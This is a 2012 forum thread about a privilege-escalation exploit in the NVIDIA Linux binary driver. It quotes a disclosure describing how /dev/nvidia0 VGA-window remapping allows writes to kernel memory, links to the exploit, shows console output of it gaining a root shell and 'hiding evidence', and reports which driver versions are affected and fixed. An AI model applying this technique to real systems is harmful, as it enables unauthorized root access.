nV News Forums

 
 

nV News Forums (http://www.nvnews.net/vbulletin/index.php)
-   NVIDIA Linux (http://www.nvnews.net/vbulletin/forumdisplay.php?f=14)
-   -   nvidia linux binary driver priv escalation exploit (http://www.nvnews.net/vbulletin/showthread.php?t=187604)

leigh123linux 08-02-12 03:29 AM

nvidia linux binary driver priv escalation exploit
 
Please fix this security issue!!


http://permalink.gmane.org/gmane.com...sclosure/86747


Quote:

First up I didn't write this but I have executed it and it did work here,

I was given this anonymously, it has been sent to nvidia over a month
ago with no reply or advisory and the original author wishes to remain
anonymous but would like to have the exploit published at this time,
so I said I'd post it for them.

It basically abuses the fact that the /dev/nvidia0 device accept
changes to the VGA window and moves the window around until it can
read/write to somewhere useful in physical RAM, then it just does an
priv escalation by writing directly to kernel memory.

Dave.
http://permalink.gmane.org/gmane.com...sclosure/86747


http://pastebin.com/Gg0LBBUA

Code:

    [leigh@main-pc Desktop]$ ./nvidia[*] IDT offset at 0xffffffff81dea000[*] Abusing nVidia...[*] CVE-2012-YYYY[*] 64-bits Kernel found at ofs 0[*] Using IDT entry: 220 (0xffffffff81deadc0)[*] Enhancing gate entry...[*] Triggering payload...[*] Hiding evidence...[*] Have root, will travel..
    sh-4.2# whoami
    root
    sh-4.2#


sjlopezb 08-03-12 06:16 PM

Re: nvidia linux binary driver priv escalation exploit
 
NO recommend user root.

Recommended user normal.

leigh123linux 08-03-12 09:41 PM

Re: nvidia linux binary driver priv escalation exploit
 
Quote:

Originally Posted by sjlopezb (Post 2570754)
NO recommend user root.

Recommended user normal.

Your reply is senseless.

towo| 08-04-12 12:36 PM

Re: nvidia linux binary driver priv escalation exploit
 
Does not work for me
Code:

~/scripts
towo:Defiant> uname -a
Linux Defiant 3.5-0.towo-siduction-amd64 #1 SMP PREEMPT Mon Jul 30 16:30:29 UTC 2012 x86_64 GNU/Linux

~/scripts
towo:Defiant> whoami
towo

~/scripts
towo:Defiant> ./nvidia [*] IDT offset at 0xffffffff8172a000[*] Abusing nVidia...[*] CVE-2012-YYYY[*] 64-bits Kernel found at ofs 0[*] Using IDT entry: 220 (0xffffffff8172adc0)[*] Enhancing gate entry...[*] Triggering payload...
Getötet

~/scripts
towo:Defiant>

driver is 304.30

artem 08-04-12 04:49 PM

Re: nvidia linux binary driver priv escalation exploit
 
304.32 drivers fix this security issue.

leigh123linux 08-04-12 06:00 PM

Re: nvidia linux binary driver priv escalation exploit
 
Confirmed


Code:

[leigh@main-pc Desktop]$ ./nvidia [*] IDT offset at 0xffffffff81dea000[*] Abusing nVidia...
[leigh@main-pc Desktop]$ ./nvidia [*] IDT offset at 0xffffffff81dea000[*] Abusing nVidia...
[leigh@main-pc Desktop]$ ./nvidia [*] IDT offset at 0xffffffff81dea000[*] Abusing nVidia...
[leigh@main-pc Desktop]$


eskuai 08-05-12 04:52 PM

failed ? nvidia linux binary driver priv escalation exploit
 
Linux darkstar 3.4.6-2.fc17.i686.PAE #1 SMP Thu Jul 19 21:49:03 UTC 2012 i686 i686 i386 GNU/Linux
[*] IDT offset at 0xc0b70000[*] Abusing nVidia...[*] CVE-2012-YYYY[*] 32-bits Kernel found at ofs 0[*] Using IDT entry: 220 (0xc0b706e0)[*] Enhancing gate entry...[*] Triggering payload...[*] Hiding evidence...
callsetroot returned 1 (1)[*] Failed to get root.

nvidia 302.17

kokoko3k 08-06-12 06:35 AM

Re: nvidia linux binary driver priv escalation exploit
 
Fails here too with nvidia 302.17, pae system

phil@elrepo 08-06-12 06:59 AM

Re: nvidia linux binary driver priv escalation exploit
 
I've been unable to exploit RHEL5 or RHEL6 64-bit systems running 256.53, 295.59 or 302.17. Some users report hard lockups (crashes) whereas I see nothing.

Code:

[phil@Quad nvidia]$ ./nvidia-exploit
[*] IDT offset at 0xffffffff804b8000
[*] Abusing nVidia...
[phil@Quad nvidia]$ whoami
phil


kokoko3k 08-08-12 11:49 AM

Re: nvidia linux binary driver priv escalation exploit
 
Well, I've had an instant reboot after i tried to change tty :)


All times are GMT -5. The time now is 06:26 PM.

Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Copyright ©1998 - 2014, nV News.